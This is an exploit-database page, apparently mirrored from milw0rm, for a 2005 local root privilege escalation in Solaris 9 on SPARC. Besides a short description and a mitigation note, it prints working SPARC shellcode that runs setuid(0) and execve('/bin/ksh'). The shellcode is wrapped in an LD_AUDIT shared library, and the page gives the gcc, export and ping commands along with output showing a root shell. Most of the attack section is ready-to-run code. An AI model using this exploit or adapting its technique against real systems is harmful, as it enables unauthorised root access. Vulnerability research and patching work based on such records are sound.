header-logo
Suggest Exploit
vendor:
Solaris
by:
milw0rm.com
7,2
CVSS
HIGH
setuid() and execve()
264
CWE
Product Name: Solaris
Affected Version From: Solaris 9 on SPARC
Affected Version To: Solaris 9 on SPARC
Patch Exists: NO
Related CWE: N/A
CPE: o:sun:solaris:9
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: SPARC
2005

Solaris 9 on SPARC

A vulnerability in Solaris 9 on SPARC allows local users to gain root privileges by exploiting a setuid() and execve() vulnerability. The exploit involves creating a shared library with the malicious code and setting the LD_AUDIT environment variable to point to the shared library. When the ping command is executed, the malicious code is executed with root privileges.

Mitigation:

The vulnerability can be mitigated by removing the setuid bit from the ping command.
Source

Exploit-DB raw data:

/* 
Solaris 9 on SPARC: 

$ cat dupa.c
*/

char sh[] =
/* setuid() */
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
/* execve() */
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";

int la_version() {
       void (*f)();
       f = (void*)sh;
       f();
       return 3;
}

/*
$ gcc -fPIC -shared -o /tmp/dupa.so dupa.c
$ export LD_AUDIT=/tmp/dupa.so
$ ping
# id
uid=0(root) gid=100(student)
*/

// milw0rm.com [2005-06-28]

Navigation

Suggest Exploit

Services By CQR